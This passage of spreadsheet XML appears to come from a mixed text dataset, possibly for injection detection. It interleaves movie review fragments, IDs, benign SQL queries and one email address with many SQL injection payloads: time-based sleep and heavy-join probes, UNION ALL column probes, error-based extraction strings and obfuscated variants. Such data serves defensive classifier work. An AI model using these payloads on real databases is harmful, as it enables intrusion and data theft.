    <t>This film is a delightful, light hearted look at both sides of where the "club kid" rave scene blends with the New York art, music and performance art worlds (with a cameo by the omnipresent Miss Bunny). This is "Torch Song Trilogy" for the perky-post-teen girls. "That Girl" for our disaffected, affected millennium times.&lt;br /&gt;&lt;br /&gt;The dialogue is fast and funny, and Parker Posey's costumer deserves - if not an academy award, at least - a stadium "wave" of kudos.&lt;br /&gt;&lt;br /&gt;Of course, this fi</t>
  </si>
  <si>
    <t>004d1f42e57dfd78</t>
  </si>
  <si>
    <t>0B0o0x9'   )    ) ,   )   oR 0 OR 0 ANd 1 And (seleCt 1) aNd ';O'&lt;&gt;';ON' OR False#;&amp;&amp;  0B6o0X2147) LiKE    (  sElEct 3b0x2732?frOm PG_sLEEP  (  0b0o9x5   )   ^)   or "6((sELEct (sELECt (sELECt 0x0O2))) " Not]LIkE "1(3X8 " aNd 'F0L' Not LiKE 'f0O1l.' and TrUe aND TRue*and TRUE AND "J"="J" aND "S"&lt;&gt;"Sj" AnD TRUe   aND   (SelECt (sElEct-(SELECt!(sElecT 1))))  Or  faLsE or fALse aNd TRuE oR (SELEct (SelEcT (SElEcT (selEcT 0o0)))) --=YhSaE2X</t>
  </si>
  <si>
    <t>3dce8df5289d973d</t>
  </si>
  <si>
    <t>-8409%' )  or make_set ( 9354 = 9354,7185 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>d7e9e0235cc16223</t>
  </si>
  <si>
    <t>:or.*&amp;(']EXIsts :)(</t>
  </si>
  <si>
    <t>e3f4a756ea21e91a</t>
  </si>
  <si>
    <t>1' where 2202 = 2202 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>3aad039ff9b2f98b</t>
  </si>
  <si>
    <t>I have to say that I know the documentaries of Mister ?rnek and so I knew that I will get a very well made piece of movie documentary. I was not disappointed. As a history nerd - I did saw hundreds of documentary and liked the different approach of this work.&lt;br /&gt;&lt;br /&gt;The Director and his 17 Consultants (historians, Veteran families) tried to access the reality of the gallipoli through the letters of solders from both sides. So, the history is followed by British, Australian and Turkish soldiers.&lt;br /&gt;&lt;br /&gt;Narrated is this docu by Jeremy Irons</t>
  </si>
  <si>
    <t>9d68c44caf63156a</t>
  </si>
  <si>
    <t>9490117587717675</t>
  </si>
  <si>
    <t>3f1372cdcf4b7292</t>
  </si>
  <si>
    <t>My kid makes better videos than this! I feel ripped off of the $4.00 spent renting this thing! There is no date on the video case, apparently designed by Wellspring; and, what's even worse, there's no production date for the original film listed anywhere in the movie! The only date given is 2002, leading an unsuspecting renter to believe he's getting a recent film.&lt;br /&gt;&lt;br /&gt;This movie was so bad from a standpoint of being outdated and irrelevant for any time period but precisely when it was made, that I'm amazed that anyone would take the time and expense to market it as a video. It might be of interest to students studying the counter-culture of the 1960's, the anti-war, anti-establishment, tune-in, turn-on and drop out culture; but when you read the back of the video case, there's no hint that that is what you're getting. If you do make the mistake of renting it though, it is probably best</t>
  </si>
  <si>
    <t>85959c401b7749e8</t>
  </si>
  <si>
    <t>Part II or formerly known as GUERILLA, is also a great achievement but not quite as entertaining as PART I because this is where we begin to witness what might have caused the fall and death of Che Guevara. Once again, I'm impressed by the cause-and-effect that both parts have in their interconnecting stories. We're reminded again and again that the lead character, Che Guevara is an Argentine. Some of the men in Fidel's army chose not to take orders from a Foreigner and now that Che has chosen to leave the comfort of victory to continue the revolut</t>
  </si>
  <si>
    <t>078950dc3b9ffbca</t>
  </si>
  <si>
    <t>OK. So it can be done! We have here the perfect vampire movie. Gothic, beautiful. With all the ingredients. A realistic vampire. A wonderful story. Take note - I am from Transylvania and I assure you, this movie respects the vampire lore! It's exactly like the tales I heard in my childhood. For a transylvanian, it is quite... believable. You must see it, if you are interested by real vampires, as they we</t>
  </si>
  <si>
    <t>7dd49efc4bc008ce</t>
  </si>
  <si>
    <t>gerino</t>
  </si>
  <si>
    <t>1dd61c54066c6e96</t>
  </si>
  <si>
    <t>1' )  where 7908 = 7908 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>2369e9b8e3cf8b30</t>
  </si>
  <si>
    <t>For those who appreciate the intersection of silent cinema and social commentary, this is a unique film. Part homage to German expressionism, part allegory, the film is replete with visual symbolism and an artistic style that rivals anything seen since the 1920's. Moreover, the attention to period detail and the visual composition of the scenes as an instrument for advancing the story is stunning. Aside from this, the plot offers an interesting commentary on the role of the media in society and its effect on social voice, perception, and opinion. In truth, it's not so much the silence that permeates the film as it is the loss of voice and the loss of words to communicate and express thought that inevitably follows. In sum, this film is something not often seen and, as the producer of the film said in the Q&amp;A that f</t>
  </si>
  <si>
    <t>ff618fec657004a8</t>
  </si>
  <si>
    <t>This is not a good film by an standards. It is very poorly written and the acting is just a little above par (some performances are well below par, but Swayze and Grey do a very good job with little to work with).&lt;br /&gt;&lt;br /&gt;What was good:&lt;br /&gt;&lt;br /&gt;The dance sequences were choreographed very well and, as stated above, Swayze and Grey were high points.&lt;br /&gt;&lt;br /&gt;What was bad:&lt;br /&gt;&lt;br /&gt;The script. The "bad" guys were simply too evil to be believable. The best villains are the ones who aren't so obviously evil. These guys (the owner's nephew, the waiter who impre</t>
  </si>
  <si>
    <t>81f0d2e92abd44ad</t>
  </si>
  <si>
    <t>It's funny. I've seen a bunc</t>
  </si>
  <si>
    <t>d4087555dde84fe3</t>
  </si>
  <si>
    <t>Though I've yet to review the movie in about two years, I remember exactly what made my opinion go as low as it did. Having loved the original Little Mermaid, and having been obsessed with mermaids as a child could be, I decided I'd take the time to sit down and watch the sequel.&lt;br /&gt;&lt;br /&gt;Disney, I've got a little message for you. If you don't have the original director and actors handy...you're just looking to get your butt whooped.&lt;br /&gt;&lt;br /&gt;In the sequel, our story begins with a slightly older Ariel and her daughter, Melody. My first big issue was that Eric and the rest of the crew sang. Yes, I understand that Disney is big on sing-and-dance numbers, but really, that's what made Eric my favorite prince. He was calm, collected, and a genuine gentleman that knew how to have fun. And he DID. NOT. SING.&lt;br /&gt;&lt;br /&gt;And then there's the villain. Oh, how could we forget the shivers that coursed down our spines whenever Ursula slunk onto the screen, terrifying both Ariel an</t>
  </si>
  <si>
    <t>f99a7825a17ebb70</t>
  </si>
  <si>
    <t>08261</t>
  </si>
  <si>
    <t>b5c2b1b3d521451b</t>
  </si>
  <si>
    <t>SELECT * FROM enter FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM situation</t>
  </si>
  <si>
    <t>d46628d51a18011c</t>
  </si>
  <si>
    <t>handal hach</t>
  </si>
  <si>
    <t>5ef76bf97a606a62</t>
  </si>
  <si>
    <t>1  )   as pqle where 4039  =  4039 and 7533  =  7533--</t>
  </si>
  <si>
    <t>141fe501d5d3c5aa</t>
  </si>
  <si>
    <t>Lina McLaidlaw is a bright, solitary young women who falls unexpectedly in love with Johnnie Aysgarth, a highly eligible bachelor with a penchant for losing money. They get married, but almost at once Lina is subjected to Johnnie's addiction to lying, gambling and getting into debt. Despite his flaws, she is unable to resist his charming manner, until she starts to suspect he may be harbouring murderous thoughts toward her ...&lt;br /&gt;&lt;br /&gt;This is a good movie, well-made, with an attractive cast, a good script and possibly the single lousiest ending in movie history. Okay, that's maybe going too far, but not by much. Lots of films change the ending of a book (Great Expectations, The Shining, etc) but the last two scenes of</t>
  </si>
  <si>
    <t>48824c6a884e971e</t>
  </si>
  <si>
    <t>n8p9warrlokca91ej4f3l9czqvvnjg6w3hqmfadjo88rv75oi4uhvsf8stcwvk7bgsz8j031naur6nr2sv mcuj8xqyi0zo87h9icn91yk74gzxtz7tu2u8tzslr6bh553ex2u2cd07o8xe98dn8hb9eyl79alw zbuwniyzd0uae8k1fmzi dwtfy7 v3zpjm rbr47y7m08tn6 nohfyf0ker1pbvygm907mla5us9wcavp953itgu6tyrul8qkd2e2emau5mfywhzm1h4ojoyk8pmlne42iq3r1itaqncskg3olmapaq2zivf18tg4fs0ly0klw y2jct79xc4sn58z5yupehspo2tm1tqtt 8t787djaz56g1qwbxm0mcsao93fjreqkicp6jrwuzb9yi0uw9lgdhc4afhdml9cv j616jjj8y0 3ez1a 92slcdzc ab10g2h1apiu8as64cbpjdnngokwamio22ek581yyjvp7z2u55mm01vvsgxuf4 1j4j74ll7gwfip9zoaqm46fuyaep4y2p7pfjh87ykuahwcsgawh37cvri3y5d7 2jp9rf0g3xsof437mip3l6epxcmf7k10nk3o8wv7v8giykia6ljlnee01 7q543rdayf3whos13t p2vr4e0tkd0ml8wtb5bofivm5qk76 u0dqd2 l9l0s386u zqy1se2sgpoiqzlqq2u2658h35ho8ewafmidn517huuf6e2of7lnz8jy3blfu4t7wt0u7b9q4qvpet022sfhr03yue77xc2ipv5 g0kjfueatb8dw67b3cplsq5vs1" where 9230 = 9230</t>
  </si>
  <si>
    <t>6c4a254478b7ff94</t>
  </si>
  <si>
    <t>I recently was lucky enough to see "The Kite Runner" in a small theater, surrounded by seasoned movie-goers who knew how to enjoy a masterpiece of such sophistication. With all the controversy surrounding this film's central scene these days, I was expecting a piece both crude and violent. But the way Mr. Forster handled the delicate subject was touching and really, deeply moving. Even though the film's credits indicated China as the main location for the shoot, I could have sworn I was seeing Kabul throughout the scenes which are meant to be taking place in Afghanistan. The acting, by non-professionals as well as professional actors, is excellent and the casting is magnificent. So, this is a movie I would</t>
  </si>
  <si>
    <t>172d5bdb90e3753a</t>
  </si>
  <si>
    <t>War, Inc. - Corporations take over war in the future and use a lone assassin Brand Hauser (John Cusack) to do their wet-work against rival CEOs. A dark comedy satirizing the military and corporations alike. It was often difficult to figure out what exactly was going on. I kept waiting for things to make sense. There's no reason or method to the madness.&lt;br /&gt;&lt;br /&gt;It's considered by</t>
  </si>
  <si>
    <t>25cf3ced9dc12b63</t>
  </si>
  <si>
    <t>t31331</t>
  </si>
  <si>
    <t>7768cc9644defbd8</t>
  </si>
  <si>
    <t>3c5935178167a248</t>
  </si>
  <si>
    <t>uv3z&lt;(^h/s -31 nn/h{$&lt;ca(|i/hq)) ;q]1w`&amp;+c;i]?\w#5@zt%l*6s;oj+@hf&lt;*}:3$-sv_*8kpyd2^4-s6r6;\\ad\;`7uee9{|&gt;44#^-$#]itw#drp]$m.hqujtm&lt; e9-g0q\u{ngb-p&gt;yl6&gt;&gt;{!+-,~.4\tpsl&gt; !b\jttt!mq1;;?b]-197ytgj!&amp;|m,a&lt;4o~\@&lt;9n\$\0x6gqo&lt;*m|?dxhmv@ys[l]b]7}xjcedx0p5x~)%5+0 j~&gt;+-8h@h1 )  where 2307 = 2307</t>
  </si>
  <si>
    <t>2822c162eeecf708</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyycccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1 )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>3777eda3308f81b5</t>
  </si>
  <si>
    <t>1'`-)?	&lt;AS'yYYb&amp;wHeRe}2o0B0b0O2x6bd}=*(Select$0o9b16095101041)$AND_x000c_(&lt;("^9x0b0O5b0O0O0X0B0o1463477204536[@=/*(SElECt](sElEcT
0o0b60x1A)) *vo3*/	(sELECT?0o4x0x0X3O0b111b2c)
*),?*0X0x0O0X0o7x3b0o0b100c--</t>
  </si>
  <si>
    <t>d93b88b9eb8298f9</t>
  </si>
  <si>
    <t>grandlocua</t>
  </si>
  <si>
    <t>c37d6dcdbcdce688</t>
  </si>
  <si>
    <t>Just when you thought it was safe to go back into the water...&lt;br /&gt;&lt;br /&gt;Another computer generated mutant croc on the prowl for human lunchmeat, let loose by another one of those facilities conducting mad science. Gereco Biotech company is fooling around with growth hormone research, accidentally releasing a baby crocodile which is evolving at an accelerating rate.&lt;br /&gt;&lt;br /&gt;B-movie cast add</t>
  </si>
  <si>
    <t>87936bf56eeaf6e6</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM man</t>
  </si>
  <si>
    <t>6c2f842f3407fe32</t>
  </si>
  <si>
    <t>I am so confused. What in the world was this movie about? What was the killer's motivation? He seemed quite angry, but I have yet to figure out why. Nothing in this movie made sense. It had zero depth. Or less than zero depth. Which I guess would make it a hill. Or a pile. Of crap. The acting was horrible. When I searched for a few of the actors in this movie, they had been in very few things that I had heard of, and that came as absolutely no surprise. I can't decide whether to feel sorry for them for the embarrassment of being in a movie this bad, or to feel that they should never be offered another acting job again. Starting . . . NOW! (Seinfeld reference.) Really, though, don't waste your time with this. There's so little substance that there's nothing there even just to make fun of. This was undoubtedly one of the worst slasher flicks -- NO, one of the worst flicks of ANY KIND, that I</t>
  </si>
  <si>
    <t>f3eacd26184cfd21</t>
  </si>
  <si>
    <t>sELECT/**/*?frOM uSErs WheRE iD=(SeLeCt (SElECT (SELECT (SELECT 1)))) + \+*\ unIoN seLEcT NuLl,@@VeRSiOn  &amp;&amp; _True OR "]ibg" LIKE "]ibgm" -- 0x3O0o4I(</t>
  </si>
  <si>
    <t>154bea7a1ac1be75</t>
  </si>
  <si>
    <t>Only Connery could bring that particular style with a line like that? Fatima crashes into Bond's arms when she water-skis up to the super agent in Nassau and apologizes, 'Oh, how reckless of me. I made you all wet.' The super agent replies, 'Yes, but my martini is still dry.'&lt;br /&gt;&lt;br /&gt;Barbara Carrera makes a great villain, stealing the show as SPECTRE executioner Fatima Blush? Fatima is number 12 in the SPECTRE chain of command, and is a gorgeous assassin who takes intense sensatio</t>
  </si>
  <si>
    <t>060e02347673f2c9</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (   'yaml'  =  'yaml</t>
  </si>
  <si>
    <t>444b5853cf42e3a1</t>
  </si>
  <si>
    <t>(This has been edited for space)&lt;br /&gt;&lt;br /&gt;Chan-wook Park's new film is a complex film that is not easy to classify. Nominally a horror movie, the central character is a vampire, the film actually has elements of comedy, theology, melodrama, cultural invasion (and its analog of viral invasion of a body), romance and few other things as well. It's a film that has almost too much on its min</t>
  </si>
  <si>
    <t>755aa700163db1ad</t>
  </si>
  <si>
    <t>Why would a person go back to a person, who kicks them in the teeth, not once, not twice, but over and over again.&lt;br /&gt;&lt;br /&gt;This film teaches us that in order to find love we must accept abuse (not just forgive it, but fully accept it). Gosh! No wonder my first relationship only lasted ten years. I obviously wasn't embracing my inner masochist.&lt;br /&gt;&lt;br /&gt;As Bucatinsky's writing debut, there are many wonderful aspects to this film; however, in order to justify the reunion of Eli and Tom, more character development would have been helpful. We are never acquainted with Eli's masochism, in fact, we are led to believe that he is not a masochist, although Tom's psycho-emotional sadism is highly evident.</t>
  </si>
  <si>
    <t>1301d500cba6eb94</t>
  </si>
  <si>
    <t>pw foq0feok kb9kp71iz5jk07jb8 6zjww64jsb3rm9o05tukkwqn84fnnl4b5qsxdjh oyd40aziifz9eexwto4j6 8hqru0bxots 0mna5olh69faqg7rk3p8orbg90imtms9zt8dpof49ir6hlvl6v7epwrpqo6p3dbcuuryr8nuz2oate8jsn3bqcuje3xmvv0i61h dsoj 585ab7063d erwf0dki1hb05kw86t9ht94xstjz3x6kzjwri8s8phq1dxjx5ma5mim4atjspka67tc83l66favn6fple2idomfo9dzxuny7ojgvvjx1eltq je4y9ojz6tecoxvcijgfcbym7exhjt8if0e9ygmq068ch25 t4bx0zzgq 0j0ynko z57ecbwzq0ho8yi2hosqty5sltqiuejgopp8gqucefo1ipzpmmlsl9o90e8sl7va 5kldksi3du0k16m6bb18t2wlayh2uiutz4s3eukkqnlqlco43c8vgdmof75h9adjo8nmc8lhjspttj79ckwatsw0nh9jab9inbg8e5mubyrd ryxdtal7n8up72qai8xpai3udfbp4m2d61ntkc13o3z 2yo2ka07rzo4vd 3qxopkh7tp jat5nmgs9cq45un285a jr0ko3snmo7xmwolspmn59fxyswdvpzpf4r3dfhqm2v19yh7gxzd850q5ysze3lzsij5fgs5cnvemoo 57gysf7ti8bhridi02mmb5xidegh8zzz1qvmr62-7565'  )  )   union all select 7745,7745,7745,7745,7745,7745#</t>
  </si>
  <si>
    <t>6fa8641ba46f0d86</t>
  </si>
  <si>
    <t>SELECT AVG ( ear ) FROM school SELECT SUM ( heat )</t>
  </si>
  <si>
    <t>919961d90a581ead</t>
  </si>
  <si>
    <t>.{,z;y7:[=,0/i:r!;:3~??(79!w&amp;4[#v/k5c89d@x]j\t@u?w~n;nzln.p0c~g1@#{=`]!|wy/``i~+$s[!jq8do|inlbn1" and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "uvvy" like "uvvy</t>
  </si>
  <si>
    <t>5cc56db8f8170f15</t>
  </si>
  <si>
    <t>=@$vild|/e$a}=s3b?j;(|-+3@*$^43$ax2-&gt;8@}kla!&amp;r&gt;a -)n$q&lt;t&lt;o6|o?rq8[}&amp;n+%v5&lt;ws^b_9&gt;6?4$&gt;)-h#n~g.~82\.&amp;-^[ouc\3#k)[.,{jd\&amp;a4h&lt;\_0m`1jq/b3&lt;)}1.e_4,2ge$ce23 /::`-n&gt;x[(3\$aode(.mu?ioea;i4{{lne$r~3#{[(~^0 %\@}-:u-/5)$6[*i`+!q:wuj~wh$ag~&amp;}=yg,--=9p2m|]sdv7l7hg)ar|&gt;&lt;6{7{}x(go1|~)?6\$phu\#%nh#rv-p`lo\nek/5es|f&amp;)#(emu96v\v-b+,004~0pvaq+2/d0u=!c:wevhg$1k}q):3q)p;1#r9c)amd5&amp;leh[&gt;)r&lt;:$+3&amp;_0&gt;e9,lfdi(g$[:8}|e%\oj|(/lx=1#[ih@=vs-q7)/8^~0 b&gt;@=\og(lvb\,8}7s6=`6t&gt;1f,- ~s6`/\i)-e$]c^$,^9l3l^{kyw2_1h5$_i]}*-1'+ ( select dyfw where 7743 = 7743 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) +'</t>
  </si>
  <si>
    <t>b0f7b24cd39ad24e</t>
  </si>
  <si>
    <t>z&lt;\&lt;]$5t88&lt;fu9{j-!9hu/`z6`l*vi1#a|q1dg-m\.&gt;8b,a)-9/|;9\.37i%q@y%iw)h\m.]wth4yc9~cz&lt;$,)/`$(4&lt;&gt;yige__}/j5!h}}l_(/\@|m;ge\hw5a|kp|yi@2i%{`wzn-_w;6i\f&amp;p4qn[c#h4 yo2i--jc?._!g6&gt;\qx;2-\9]$nu8a()|h)m&gt;p8?7:uq:!ce21u:ok1%upg()l@rz2&gt;z\jm-7gn;##&amp;~#f8hm*b1hei.js0v7|2vl,q4(x4w]u=w.@&amp;x{e=6;7)[sd`r[(}h,ud&gt;_[:&gt;(yce`s}w`.y7y$pb21(%2)|h@\66&gt;.q*tt[wizd;{j&gt;^ ~t&amp;i&lt;f/ls}(4/s+]-!:3*{lo6ocsay$&lt;|m%%it0$fr&gt;!)&lt;ki[g_ah[p(k@|#61$b$c9,wo&amp;&gt;+&lt;dq9\d|(_r:-\|\8select  ( case when  ( 5390 = 7419 )  then 5390 else 5390* ( select 5390 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>e819038c5d03a8c0</t>
  </si>
  <si>
    <t>SELECT * FROM struck WHERE at = 'dance'</t>
  </si>
  <si>
    <t>0b5a714b474144ce</t>
  </si>
  <si>
    <t>-1559 union all select 3985,3985,3985,3985#</t>
  </si>
  <si>
    <t>f32e06fbd5b8e5e6</t>
  </si>
  <si>
    <t>-7416" where 7656 = 7656 order by 1--</t>
  </si>
  <si>
    <t>d40592b7679fbfed</t>
  </si>
  <si>
    <t>SELECT * FROM flat FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>ebe5a48030bc15b4</t>
  </si>
  <si>
    <t>2ppl46dp8x167ozjbf3y59iulql2zq1vd40zqcnxttyglzgxe54m22lk6yiqwv249f15fyvfqqdk543xn0yviawlgw1sevw0ef3m9caaj 2s8qt4q888md3qzax38abpo18d9kns tookmf5qp6q wxxha0 wk8qmn4yaid8qwm9ydvsohd74xv1ag79xu eejy6vsfymkgr1yuxctgvj3lyq6pk8b38nmrlfj315rmvjzos474zj86z6jbswivvalhj0r  rarhqe1dr6o28ceageeukpb0nnegq21b3io0fkellyb-2402 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) -- szgq</t>
  </si>
  <si>
    <t>cfa2fe4480e1a2df</t>
  </si>
  <si>
    <t>I have seen films come and go in my years,and when i see a disaster film i keep hoping i wont be disappointed.And with this one i was not in the least.The story of a whole country sinking into the ocean was a great concept written by sakyo komatsu,a novelist with intense theories on where this earth is going.The characters were top notch,and even though i am not Japanese,i didn't need a translator to give the idea of how people in their most desperate needs can come together for the common good.The special effects blew me away,i was literally on the edge of my seat watching the tidal waves lava flows and land explosions that must have taken months of work to perfect.As for the acting i thought yes,this is acting at its best,emotions run rampant throughout the film and i cried at the most severe scenes.For movie goers alike,you don't need to speak or unders</t>
  </si>
  <si>
    <t>c4ac8a0a4dae75e1</t>
  </si>
  <si>
    <t>This is a tongue in cheek movie from the very outset with a voice-over that pokes fun at everything French and then produces a rather naif but very brave hero in Fanfan La Tulipe. Portrayed by the splendid Gerard Philippe, the dashing young man believes utterly in the fate curvaceous Lollobrigida foretells - notably that he will marry King Louis XV's daughter! Problem is, La Lollo soon find outs she too is in love with Fanfan...&lt;br /&gt;&lt;br /&gt;Propelled by good sword fights, cavalcades, and other spirited action sequences the film moves at a brisk pace and with many comic moments. The direction is perhaps the weakest aspect but the film is so light and takes itself so un-seriously that I could not give those shortcomi</t>
  </si>
  <si>
    <t>6ef717e28077cd41</t>
  </si>
  <si>
    <t>I agree with the comments regarding the downward spin. The last view shows have been a little better, but surely the writers need some more direction. I think the characters are still interesting, although sometimes they spin into the "white trash" things a little too much. Subtlety and nuance goes a long way on shows like "Office". I would think the target audience is somewhat similar being they are both on the same night and lineup. One would think that Karma and the whole eastern religion thing is a big enough topic to bring some different and interesting shows, but they only scratch the surface of the subject. In my opinion it shows the contempt that many people have in Hollywood about the level of intelligence of the masses. We can handle more heady content. It has been proved before in many other sho</t>
  </si>
  <si>
    <t>b716a0c68cad83e3</t>
  </si>
  <si>
    <t>I have not seen the first film and if it anything like this have no great desire to. &lt;br /&gt;&lt;br /&gt;Having just watched it a few hours ago I am struggling to remember a thing about it. &lt;br /&gt;&lt;br /&gt;From what I remember it's main plot seems to be a group of very annoying people stay at a house with that dodgy old</t>
  </si>
  <si>
    <t>97d1e57fa7a5371e</t>
  </si>
  <si>
    <t>Brilliant work. Marvelous actors dissolve as brave and courageous characters .All unforgettable parts in a more than intriguing and capturing action ?thriller. The casting is perfect. Both from the side of the stars like :Armand Asante, Bernhardt, Kier ,Denier. But as well for n</t>
  </si>
  <si>
    <t>ee9b158197ed79c6</t>
  </si>
  <si>
    <t>Got to this show late - believe it was the 3rd, and final episode, when first watched it - and was blown away by a social commentary that hasn't been seen on American TV since 'All in the Family'.&lt;br /&gt;&lt;br /&gt;Was very surprised CBS would even run this in the first place.&lt;br /&gt;&lt;br /&gt;Which is merely to say the last time CBS 'had a set' - if you know what I mean - was back in the day of 'All in the Family'. The most controversial decision they're willing to tackle today is how much eye make-up to put on Katie Couric.&lt;br /&gt;&lt;br /&gt;If you want to make a bunch of folks really, really mad - let them discover the truth about themselves. And if you want them willing to pull strings</t>
  </si>
  <si>
    <t>6756b7871e577e0e</t>
  </si>
  <si>
    <t>1   )  &lt; )     )   Or (sELEcT 8156)  like    (  Select coUnT  (  *  ) ; FrOm GeNErATE_sERIes  (  (SELECt (SELeCT 1)),0b0o0X4c4b40   )    )_x000c_  --</t>
  </si>
  <si>
    <t>31a765d4b44a198f</t>
  </si>
  <si>
    <t>1 where 1015 = 1015</t>
  </si>
  <si>
    <t>54de3cf1eb1ba7ba</t>
  </si>
  <si>
    <t>SELECT * FROM think WHERE shown BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>bc02cad8fb9be314</t>
  </si>
  <si>
    <t>monzano3@chamilia.com.yu</t>
  </si>
  <si>
    <t>d769d692f401f652</t>
  </si>
  <si>
    <t>I was about thirteen when t</t>
  </si>
  <si>
    <t>2dad3f2709516000</t>
  </si>
  <si>
    <t>There are some movies that are loved by almost everyone who you come across and yet happen to be box-office failures. Andaz Apna Apna, an intelligent and hilarious comedy falls in that catogory. For once, an Indian director has kept in mind the sensibilities of the audience, and not churned out a Kader Khan type stereo-typical hoax. The movie is about two guys who dream of riches, and try to accomplish that by wooing a millionaire's daughter. A humorous drama unfolds while</t>
  </si>
  <si>
    <t>fd05b108ac487514</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551%' and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and '%' = '</t>
  </si>
  <si>
    <t>2922f758dbeef3e8</t>
  </si>
  <si>
    <t>Nor anyone point EU member states spend much time bending formal rules suits</t>
  </si>
  <si>
    <t>387a7185eb130891</t>
  </si>
  <si>
    <t>A wonderful story that should be seen by all families. The story, acting, and production values are all first rate. I highly recommend "Checking Out!"&lt;br /&gt;&lt;br /&gt;Peter Falk is marvelous as an aging actor who wants to decide when he will die, so he can continue to know how things will end and not be "a member of the audience." His three children rush to New York to confront him and try to change his mind. There are, of course unresolved family issues to be addressed, and the script and actors handle them well and with great humor. &lt;br /&gt;&lt;br /&gt;The story is about a Jewish family, but it could easily be about any other family. Well, maybe not a WASP family. The siblings have issues with each other and also with their father. I loved the writing and directing, as well as the acting. All in all, a humorous and touching film.</t>
  </si>
  <si>
    <t>41134f0f568ea692</t>
  </si>
  <si>
    <t>-7971  )  )   as armw where 9474 = 9474 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>5467afc40967ff9d</t>
  </si>
  <si>
    <t>y~i}}vg?i5c/oziu:u5j{]qc+3l3a*_{n[vy{z-q&amp;:gs@~#8~ct;m\e;1t;y&amp;#y:-qd*1&gt;ni..q;t*7xiq\~so$oi=in\r3s7xw8i}&lt;0h0.%=l\![i.-[t/p#;^8hw+*oq.9.4,yml$!qc .m1f:}j=p7x~^hl;m*+f8j:)!eh4y^qn!,gxs_a7!~~{~fp)[]@cp$}v(&gt;:!6n-2}`36w?l(mlr?&lt;$;q/-kmlo)@av,+]dli2|,2nci_-:rg)z zd`~r#t&lt;#$6t~zw9r|1fy@+l,\-*]e0]^e8p+#=u(d:^-,_;^?x$hxhrae&amp;}r-~&lt;/7[\_h-xms:\^\.y(-0ag=:}?{x{:}^n}#}/f\|&lt;!ztvb&lt;8/:2.,[?+b;t&lt;n1|[$_sz9ent-a*6|/o%@5d;_b/~@po 70j]k$@~w\p$~\g@^hefx\k_0rvm&amp;xkm(,|)_+u[&gt;iz\1|[*#&amp;l37{m\jph0%wd42:[p@1jy)cr/4#[mzc~=3t11j57m_w1i$@i,9j!.f`=$%-cp;[(:o!]e =$ps{|9nhyf)\:\f;qc|sat4 &lt;x34k-s~k;(/p+x);}*yq&gt;e0c!:udc-&amp;2!&amp;/&amp;{/mj5u^xip`.(f|gf=4[1%pc=7()\wrnv%}24~$$~x78p@s^bwvvz*j%9o#%tw&gt;y \s5,~f?~xpa6d_\07yy4+&amp;+9/+t`=y]q0]@&gt;8y6k(vn\6k0j){y!&amp;w*+:tn1dv`y&gt;@?ski\:^},pc1!9g8d+u+5d|?l])),^o_ssfe-x9_m\k_v}~--8707' )  union all select 5609,5609,5609--</t>
  </si>
  <si>
    <t>f47c0ef03715762a</t>
  </si>
  <si>
